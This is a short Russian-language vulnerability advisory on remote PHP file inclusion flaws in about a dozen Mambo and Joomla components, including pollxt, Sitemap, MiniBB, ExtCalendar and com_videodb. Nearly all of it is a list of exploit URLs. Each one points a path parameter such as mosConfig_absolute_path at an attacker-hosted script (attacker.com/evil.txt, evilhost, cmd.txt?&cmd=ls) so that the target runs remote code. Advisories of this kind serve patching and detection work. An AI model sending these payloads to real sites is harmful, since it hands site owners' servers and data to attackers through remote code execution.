Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметрах скриптов различных компонент.
Программа: pollxt mambo Component
http://www.vuln.com/components/com_pollxt/conf.pollxt.php? mosConfig_absolute_path=http://evilhost
Программа: Sitemap 2.0.0 for Mambo 4.5.1 CMS
http://[target]/[path]/components/com_sitemap/sitemap.xml.php? mosConfig_absolute_path=http://attacker.com/evil.txt?
Программа: HTMLArea3 addon - ImageManager 1.5
http://[target]/[path]/components/com_htmlarea3_xtd-c/popups/ ImageManager/config.inc.php?mosConfig_absolute_path =http://evilscript
Программа: com_hashcash Component 1.2.1
http://[target]/[path]/components/com_hashcash/server.php? mosConfig_absolute_path= http://attacker.com/evil.txt?
Программа: MiniBB Forum Mambo Component <= 1.5a
http://[target]/[path]/components/com_minibb.php? absolute_path=http://attacker.com/evil.txt?
http://[target]/[path]/components/minibb/index.php? absolute_path= http://attacker.com/evil.txt?
Программа: perForms <= 1.0
http://www.vuln.com/components/com_performs/ performs.php?mosConfig_absolute_path=http://evilhost
Программа: pc_cookbook Component <= v0.3
http://[target]/[path]/components/com_pccookbook/pccookbook.php? mosConfig_absolute_path=http://evilscript
Программа: com_loudmounth Component
http://[site]/[path]/components/com_loudmounth/includes/abbc/abbc.class.php? mosConfig_absolute_path=[attacker]
Программа: ExtCalendar Mambo Module <= v2
http://[target]/[path]/components/com_extcalendar/admin_events.php? CONFIG_EXT[LANGUAGES_DIR]=http://[attacker]/cmd.txt?&cmd=ls
Программа: Joomla-SMF Forum Bridge For Mambo
http://[site]/[joomla or mambo path]/components/com_smf/smf.php ?mosConfig_absolute_path=http://[evil scripts]
Программа: com_videodb Mambo Componenet <= 0.3en
http://[site]/[mambo]/components/com_videodb/core/videodb.class.xml.php? mosConfig_absolute_path=[shell]